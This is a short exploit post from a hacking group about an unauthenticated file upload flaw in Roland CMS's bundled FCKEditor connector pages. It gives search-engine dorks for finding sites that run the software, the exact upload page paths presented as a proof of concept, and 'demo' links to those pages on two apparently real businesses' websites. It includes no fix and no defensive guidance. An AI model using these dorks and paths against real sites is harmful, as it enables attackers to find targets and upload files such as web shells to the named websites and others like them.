facebook facebook twitter rss

Roland CMS File Upload Vulnerability (FCKEditor)

Author: Iran Cyber Security Group , Published: 08-06-2015
# Exploit Title : Roland CMS File Upload Vulnerability (FCKEditor)

# Date : 09/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : WH!T3 W01F

# Contact : whit3_w01f@att.net

# Software Link : www.schatzer.it

# Version : All Versions

# Category : Web Application Bugs

# Google Dork : intext:"Created by: Roland Schatzer Service"

# Bing Dork : "Created by: Roland Schatzer Service"

# Tested On : Windows

# Home : Iran-Cyber.Org

# PoC :

Exploit 1 : site.com/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/test.html

Exploit 2 : site.com/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/uploadtest.html

# Demo

http://www.gasthof-stern.com/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/uploadtest.html

http://www.schwarzenbach.it/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/test.html

# Thanks To : root3r - KamraN HellisH - MOHAMAD-NOFOZI - Sheytan Azzam - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group

Like us on Facebook :